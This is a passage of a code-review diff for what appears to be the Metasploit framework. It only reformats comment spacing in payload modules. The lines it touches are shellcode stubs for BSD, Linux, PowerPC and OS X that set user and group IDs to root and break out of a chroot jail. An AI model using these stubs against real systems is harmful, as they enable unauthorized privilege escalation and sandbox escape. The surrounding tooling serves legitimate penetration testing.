### PR TITLE
fix continuation warnings in payloads

### DIFF
--- a/lib/msf/core/payload/bsd.rb
+++ b/lib/msf/core/payload/bsd.rb
@@ -93,69 +93,69 @@ module Msf::Payload::Bsd
   def handle_x64_bsd_opts(pre, app)
     if (datastore['PrependSetresuid'])
       # setresuid(0, 0, 0)
-      pre << "\x48\x31\xc0"         +# xor rax, rax
-             "\x48\x83\xc8\x4d"     +# or rax, 77  (setgid=311>>2=77)
-             "\x48\xc1\xe0\x02"     +# shl rax, 2
-             "\x48\x83\xf0\x03"     +# xor rax, 3 (311&3=3)
-             "\x48\x31\xff"         +# xor rdi, rdi 0
-             "\x48\x31\xf6"         +# xor rsi, rsi  0
-             "\x48\x31\xd2"         +# xor rdx, rdx  0
-             "\x0f\x05"             # syscall
+      pre << "\x48\x31\xc0"         + # xor rax, rax
+             "\x48\x83\xc8\x4d"     + # or rax, 77  (setgid=311>>2=77)
+             "\x48\xc1\xe0\x02"     + # shl rax, 2
+             "\x48\x83\xf0\x03"     + # xor rax, 3 (311&3=3)
+             "\x48\x31\xff"         + # xor rdi, rdi 0
+             "\x48\x31\xf6"         + # xor rsi, rsi  0
+             "\x48\x31\xd2"         + # xor rdx, rdx  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetreuid'])
       # setreuid(0, 0)
-      pre << "\x48\x31\xc0"         +# xor rax, rax
-             "\x48\x83\xc8\x7e"     +# or rax, 126  (setreuid=126)
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x48\x31\xf6"         +# xor rsi, rsi  0
-             "\x0f\x05"             # syscall
+      pre << "\x48\x31\xc0"         + # xor rax, rax
+             "\x48\x83\xc8\x7e"     + # or rax, 126  (setreuid=126)
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x48\x31\xf6"         + # xor rsi, rsi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetuid'])
       # setuid(0)
-      pre << "\x48\x31\xc0"         +# xor rax, rax
-             "\x48\x83\xc8\x17"     +# or rax, 23  (setuid=23)
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x0f\x05"             # syscall
+      pre << "\x48\x31\xc0"         + # xor rax, rax
+             "\x48\x83\xc8\x17"     + # or rax, 23  (setuid=23)
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetresgid'])
       # setresgid(0, 0, 0)
-      pre << "\x48\x31\xc0"         +# xor rax, rax
-             "\x48\x83\xc8\x4e"     +# or rax, 78  (setgid=312>>2=78)
-             "\x48\xc1\xe0\x02"     +# shl rax, 2 (78<<2=312)
-             "\x48\x31\xff"         +# xor rdi, rdi 0
-             "\x48\x31\xf6"         +# xor rsi, rsi  0
-             "\x48\x31\xd2"         +# xor rdx, rdx  0
-             "\x0f\x05"             # syscall
+      pre << "\x48\x31\xc0"         + # xor rax, rax
+             "\x48\x83\xc8\x4e"     + # or rax, 78  (setgid=312>>2=78)
+             "\x48\xc1\xe0\x02"     + # shl rax, 2 (78<<2=312)
+             "\x48\x31\xff"         + # xor rdi, rdi 0
+             "\x48\x31\xf6"         + # xor rsi, rsi  0
+             "\x48\x31\xd2"         + # xor rdx, rdx  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetregid'])
       # setregid(0, 0)
-      pre << "\x48\x31\xc0"         +# xor rax, rax
-             "\x48\x83\xc8\x7f"     +# or rax, 127  (setuid=127)
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x48\x31\xf6"         +# xor rsi, rsi  0
-             "\x0f\x05"             # syscall
+      pre << "\x48\x31\xc0"         + # xor rax, rax
+             "\x48\x83\xc8\x7f"     + # or rax, 127  (setuid=127)
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x48\x31\xf6"         + # xor rsi, rsi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetgid'])
       # setgid(0)
-      pre << "\x48\x31\xc0"         +# xor rax, rax
-             "\x48\x83\xc8\x5a"     +# or rax, 90  (setgid=181>>1=90)
-             "\x48\xd1\xe0"         +# shl rax, 1
-             "\x48\x83\xc8\x01"     +# or rax, 1 (setgid=181&1=1)
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x0f\x05"             # syscall
+      pre << "\x48\x31\xc0"         + # xor rax, rax
+             "\x48\x83\xc8\x5a"     + # or rax, 90  (setgid=181>>1=90)
+             "\x48\xd1\xe0"         + # shl rax, 1
+             "\x48\x83\xc8\x01"     + # or rax, 1 (setgid=181&1=1)
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['AppendExit'])
       # exit(0)
-      app << "\x48\x31\xc0"         +# xor rax, rax
-             "\x48\x83\xc8\x01"     +# or rax, 1  (exit=1)
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x0f\x05"             # syscall
+      app << "\x48\x31\xc0"         + # xor rax, rax
+             "\x48\x83\xc8\x01"     + # or rax, 1  (exit=1)
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x0f\x05"               # syscall
     end
   end
 

--- a/lib/msf/core/payload/bsd/x86.rb
+++ b/lib/msf/core/payload/bsd/x86.rb
@@ -59,70 +59,70 @@ module X86
   def handle_x86_bsd_opts(pre, app)
     if (datastore['PrependSetresuid'])
       # setresuid(0, 0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x66\xb8\x37\x01"     +#   movw    $0x0137,%ax                #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x66\xb8\x37\x01"     + #   movw    $0x0137,%ax                #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['PrependSetreuid'])
       # setreuid(0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x7e"             +#   movb    $0x7e,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x7e"             + #   movb    $0x7e,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['PrependSetuid'])
       # setuid(0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x17"             +#   movb    $0x17,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x17"             + #   movb    $0x17,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['PrependSetresgid'])
       # setresgid(0, 0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x66\xb8\x38\x01"     +#   movw    $0x0138,%ax                #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x66\xb8\x38\x01"     + #   movw    $0x0138,%ax                #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['PrependSetregid'])
       # setregid(0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x7f"             +#   movb    $0x7f,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x7f"             + #   movb    $0x7f,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['PrependSetgid'])
       # setgid(0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\xb5"             +#   movb    $0xb5,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\xb5"             + #   movb    $0xb5,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['AppendExit'])
       # exit(0)
-      app << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x01"             +#   movb    $0x01,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      app << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x01"             + #   movb    $0x01,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
   end
 

--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -99,113 +99,113 @@ module Msf::Payload::Linux
       # Prepend
 
       if (datastore['PrependFork'])
-        pre << "\x6a\x02"             +#   pushb   $0x2                       #
-               "\x58"                 +#   popl    %eax                       #
-               "\xcd\x80"             +#   int     $0x80       ; fork         #
-               "\x85\xc0"             +#   test    %eax,%eax                  #
-               "\x74\x06"             +#   jz      0xf                        #
-               "\x31\xc0"             +#   xor     %eax,%eax                  #
-               "\xb0\x01"             +#   movb    $0x1,%al    ; exit         #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x6a\x02"             + #   pushb   $0x2                       #
+               "\x58"                 + #   popl    %eax                       #
+               "\xcd\x80"             + #   int     $0x80       ; fork         #
+               "\x85\xc0"             + #   test    %eax,%eax                  #
+               "\x74\x06"             + #   jz      0xf                        #
+               "\x31\xc0"             + #   xor     %eax,%eax                  #
+               "\xb0\x01"             + #   movb    $0x1,%al    ; exit         #
+               "\xcd\x80"               #   int     $0x80                      #
       end
 
       if (datastore['PrependSetresuid'])
         # setresuid(0, 0, 0)
-        pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-               "\xf7\xe3"             +#   mull    %ebx                       #
-               "\xb0\xa4"             +#   movb    $0xa4,%al                  #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
+               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+               "\xf7\xe3"             + #   mull    %ebx                       #
+               "\xb0\xa4"             + #   movb    $0xa4,%al                  #
+               "\xcd\x80"               #   int     $0x80                      #
       end
 
       if (datastore['PrependSetreuid'])
         # setreuid(0, 0)
-        pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-               "\x6a\x46"             +#   pushl   $0x46                      #
-               "\x58"                 +#   popl    %eax                       #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
+               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+               "\x6a\x46"             + #   pushl   $0x46                      #
+               "\x58"                 + #   popl    %eax                       #
+               "\xcd\x80"               #   int     $0x80                      #
       end
 
       if (datastore['PrependSetuid'])
         # setuid(0)
-        pre << "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-               "\x6a\x17"             +#   pushl   $0x17                      #
-               "\x58"                 +#   popl    %eax                       #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+               "\x6a\x17"             + #   pushl   $0x17                      #
+               "\x58"                 + #   popl    %eax                       #
+               "\xcd\x80"               #   int     $0x80                      #
       end
 
       if (datastore['PrependSetresgid'])
         # setresgid(0, 0, 0)
-        pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-               "\xf7\xe3"             +#   mull    %ebx                       #
-               "\xb0\xaa"             +#   movb    $0xaa,%al                  #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
+               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+               "\xf7\xe3"             + #   mull    %ebx                       #
+               "\xb0\xaa"             + #   movb    $0xaa,%al                  #
+               "\xcd\x80"               #   int     $0x80                      #
       end
 
       if (datastore['PrependSetregid'])
         # setregid(0, 0)
-        pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-               "\x6a\x47"             +#   pushl   $0x47                      #
-               "\x58"                 +#   popl    %eax                       #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
+               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+               "\x6a\x47"             + #   pushl   $0x47                      #
+               "\x58"                 + #   popl    %eax                       #
+               "\xcd\x80"               #   int     $0x80                      #
       end
 
       if (datastore['PrependSetgid'])
         # setgid(0)
-        pre << "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-               "\x6a\x2e"             +#   pushl   $0x2e                      #
-               "\x58"                 +#   popl    %eax                       #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+               "\x6a\x2e"             + #   pushl   $0x2e                      #
+               "\x58"                 + #   popl    %eax                       #
+               "\xcd\x80"               #   int     $0x80                      #
       end
       if (datastore['PrependChrootBreak'])
         # setreuid(0, 0)
-        pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
-               "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-               "\x6a\x46"             +#   pushl   $0x46                      #
-               "\x58"                 +#   popl    %eax                       #
-               "\xcd\x80"              #   int     $0x80                      #
+        pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
+               "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+               "\x6a\x46"             + #   pushl   $0x46                      #
+               "\x58"                 + #   popl    %eax                       #
+               "\xcd\x80"               #   int     $0x80                      #
 
         # break chroot
-        pre << "\x6a\x3d"             +#   pushl  $0x3d                       #
+        pre << "\x6a\x3d"             + #   pushl  $0x3d                       #
              # build dir str (ptr in ebx)
-             "\x89\xe3"             +#   movl   %esp,%ebx                   #
+             "\x89\xe3"             + #   movl   %esp,%ebx                   #
              # mkdir(dir)
-             "\x6a\x27"             +#   pushl  $0x27                       #
-             "\x58"                 +#   popl   %eax                        #
-             "\xcd\x80"             +#   int     $0x80                      #
+             "\x6a\x27"             + #   pushl  $0x27                       #
+             "\x58"                 + #   popl   %eax                        #
+             "\xcd\x80"             + #   int     $0x80                      #
              # chroot(dir)
-             "\x89\xd9"             +#   movl   %ebx,%ecx                   #
-             "\x58"                 +#   popl   %eax                        #
-             "\xcd\x80"             +#   int     $0x80                      #
+             "\x89\xd9"             + #   movl   %ebx,%ecx                   #
+             "\x58"                 + #   popl   %eax                        #
+             "\xcd\x80"             + #   int     $0x80                      #
              # build ".." str (ptr in ebx)
-             "\x31\xc0"             +#   xorl   %eax,%eax                   #
-             "\x50"                 +#   pushl  %eax                        #
+             "\x31\xc0"             + #   xorl   %eax,%eax                   #
+             "\x50"                 + #   pushl  %eax                        #
 
-             "\x66\x68\x2e\x2e"     +#   pushw  $0x2e2e                     #
-             "\x89\xe3"             +#   movl   %esp,%ebx                   #
+             "\x66\x68\x2e\x2e"     + #   pushw  $0x2e2e                     #
+             "\x89\xe3"             + #   movl   %esp,%ebx                   #
              # loop changing dir
-             "\x6a\x3d"             +#   pushl  $0x1e                       #
-             "\x59"                 +#   popl   %ecx                        #
-             "\xb0\x0c"             +#   movb   $0xc,%al                    #
-             "\xcd\x80"             +#   int     $0x80                      #
-             "\xe2\xfa"             +#   loop   -6                          #
+             "\x6a\x3d"             + #   pushl  $0x1e                       #
+             "\x59"                 + #   popl   %ecx                        #
+             "\xb0\x0c"             + #   movb   $0xc,%al                    #
+             "\xcd\x80"             + #   int     $0x80                      #
+             "\xe2\xfa"             + #   loop   -6                          #
              # final chroot
-             "\x6a\x3d"             +#   pushl  $0x3d                       #
-             "\x89\xd9"             +#   movl   %ebx,%ecx                   #
-             "\x58"                 +#   popl   %eax                        #
-             "\xcd\x80"              #   int     $0x80                      #
+             "\x6a\x3d"             + #   pushl  $0x3d                       #
+             "\x89\xd9"             + #   movl   %ebx,%ecx                   #
+             "\x58"                 + #   popl   %eax                        #
+             "\xcd\x80"               #   int     $0x80                      #
 
       end
 
       # Append exit(0)
 
       if (datastore['AppendExit'])
-        app << "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-          "\x6a\x01"             +#   pushl   $0x01                      #
-          "\x58"                 +#   popl    %eax                       #
+        app << "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+          "\x6a\x01"             + #   pushl   $0x01                      #
+          "\x58"                 + #   popl    %eax                       #
           "\xcd\x80"              #   int     $0x80                      #
       end
 
@@ -216,65 +216,65 @@ module Msf::Payload::Linux
 
       if (datastore['PrependSetresuid'])
         # setresuid(0, 0, 0)
-        pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\xa5\x2a\x78"     +#   xor     r5,r5,r5                   #
-               "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\xa5"     +#   addi    r0,r31,-347                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\xa5\x2a\x78"     + #   xor     r5,r5,r5                   #
+               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\xa5"     + #   addi    r0,r31,-347                #
+               "\x44\xff\xff\x02"       #   sc                                 #
       end
 
       if (datastore['PrependSetreuid'])
         # setreuid(0, 0)
-        pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x47"     +#   addi    r0,r31,-441                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\x47"     + #   addi    r0,r31,-441                #
+               "\x44\xff\xff\x02"       #   sc                                 #
       end
 
       if (datastore['PrependSetuid'])
         # setuid(0)
-        pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x18"     +#   addi    r0,r31,-488                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\x18"     + #   addi    r0,r31,-488                #
+               "\x44\xff\xff\x02"       #   sc                                 #
       end
 
       if (datastore['PrependSetresgid'])
         # setresgid(0, 0, 0)
-        pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\xa5\x2a\x78"     +#   xor     r5,r5,r5                   #
-               "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\xab"     +#   addi    r0,r31,-341                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\xa5\x2a\x78"     + #   xor     r5,r5,r5                   #
+               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\xab"     + #   addi    r0,r31,-341                #
+               "\x44\xff\xff\x02"       #   sc                                 #
       end
 
       if (datastore['PrependSetregid'])
         # setregid(0, 0)
-        pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x48"     +#   addi    r0,r31,-440                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\x48"     + #   addi    r0,r31,-440                #
+               "\x44\xff\xff\x02"       #   sc                                 #
       end
 
       if (datastore['PrependSetgid'])
         # setgid(0)
-        pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x2f"     +#   addi    r0,r31,-465                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\x2f"     + #   addi    r0,r31,-465                #
+               "\x44\xff\xff\x02"       #   sc                                 #
       end
 
       if (datastore['PrependChrootBreak'])
         # setreuid(0, 0)
-        pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x47"     +#   addi    r0,r31,-441                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        pre << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\x84\x22\x78"     + #   xor     r4,r4,r4                   #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\x47"     + #   addi    r0,r31,-441                #
+               "\x44\xff\xff\x02"       #   sc                                 #
 
         # EEK! unsupported...
       end
@@ -282,10 +282,10 @@ module Msf::Payload::Linux
       # Append exit(0)
 
       if (datastore['AppendExit'])
-        app << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
-               "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
-               "\x38\x1f\xfe\x02"     +#   addi    r0,r31,-510                #
-               "\x44\xff\xff\x02"      #   sc                                 #
+        app << "\x3b\xe0\x01\xff"     + #   li      r31,511                    #
+               "\x7c\x63\x1a\x78"     + #   xor     r3,r3,r3                   #
+               "\x38\x1f\xfe\x02"     + #   addi    r0,r31,-510                #
+               "\x44\xff\xff\x02"       #   sc                                 #
       end
 
     elsif (test_arch.include?(ARCH_X64))

--- a/lib/msf/core/payload/osx.rb
+++ b/lib/msf/core/payload/osx.rb
@@ -78,48 +78,48 @@ module Msf::Payload::Osx
 
     if (datastore['PrependSetreuid'])
       # setreuid(0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x7e"             +#   movb    $0x7e,%al                  #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x7e"             + #   movb    $0x7e,%al                  #
              "\xcd\x80"              #   int     $0x80                      #
     end
 
     if (datastore['PrependSetuid'])
       # setuid(0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x17"             +#   movb    $0x17,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x17"             + #   movb    $0x17,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['PrependSetregid'])
       # setregid(0, 0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x7f"             +#   movb    $0x7f,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x7f"             + #   movb    $0x7f,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['PrependSetgid'])
       # setgid(0)
-      pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\xb5"             +#   movb    $0xb5,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      pre << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\xb5"             + #   movb    $0xb5,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
 
     if (datastore['AppendExit'])
       # exit(0)
-      app << "\x31\xc0"             +#   xorl    %eax,%eax                  #
-             "\x50"                 +#   pushl   %eax                       #
-             "\xb0\x01"             +#   movb    $0x01,%al                  #
-             "\xcd\x80"              #   int     $0x80                      #
+      app << "\x31\xc0"             + #   xorl    %eax,%eax                  #
+             "\x50"                 + #   pushl   %eax                       #
+             "\xb0\x01"             + #   movb    $0x01,%al                  #
+             "\xcd\x80"               #   int     $0x80                      #
     end
   end
 
@@ -127,56 +127,56 @@ module Msf::Payload::Osx
 
     if (datastore['PrependSetreuid'])
       # setreuid(0, 0)
-      pre << "\x41\xb0\x02"         +# mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
-             "\x49\xc1\xe0\x18"     +# shl r8, 24
-             "\x49\x83\xc8\x7e"     +# or r8, 126  (setreuid=126)
-             "\x4c\x89\xc0"         +# mov rax, r8
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x48\x31\xf6"         +# xor rsi, rsi  0
-             "\x0f\x05"             # syscall
+      pre << "\x41\xb0\x02"         + # mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
+             "\x49\xc1\xe0\x18"     + # shl r8, 24
+             "\x49\x83\xc8\x7e"     + # or r8, 126  (setreuid=126)
+             "\x4c\x89\xc0"         + # mov rax, r8
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x48\x31\xf6"         + # xor rsi, rsi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetuid'])
       # setuid(0)
-      pre << "\x41\xb0\x02"         +# mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
-             "\x49\xc1\xe0\x18"     +# shl r8, 24
-             "\x49\x83\xc8\x17"     +# or r8, 23  (setuid=23)
-             "\x4c\x89\xc0"         +# mov rax, r8
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x0f\x05"             # syscall
+      pre << "\x41\xb0\x02"         + # mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
+             "\x49\xc1\xe0\x18"     + # shl r8, 24
+             "\x49\x83\xc8\x17"     + # or r8, 23  (setuid=23)
+             "\x4c\x89\xc0"         + # mov rax, r8
+             "\x48\x31\xff"         + # xor rdi, rdi  0
+             "\x0f\x05"               # syscall
     end
 
     if (datastore['PrependSetregid'])
       # setregid(0, 0)
-      pre << "\x41\xb0\x02"         +# mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
-             "\x49\xc1\xe0\x18"     +# shl r8, 24
-             "\x49\x83\xc8\x7f"     +# or r8, 127  (setregid=127)
-             "\x4c\x89\xc0"         +# mov rax, r8
-             "\x48\x31\xff"         +# xor rdi, rdi  0
-             "\x48\x31\xf6"         +# xor rsi, rsi  0
-             "\x0f\x05"             # syscall
+      pre << "\x41\xb0\x02"         + # mov r8b, 0x2   (Set syscall_class to UNIX=2<<24)
+             "\x49\xc1\xe0\x18"     + # shl r8, 24
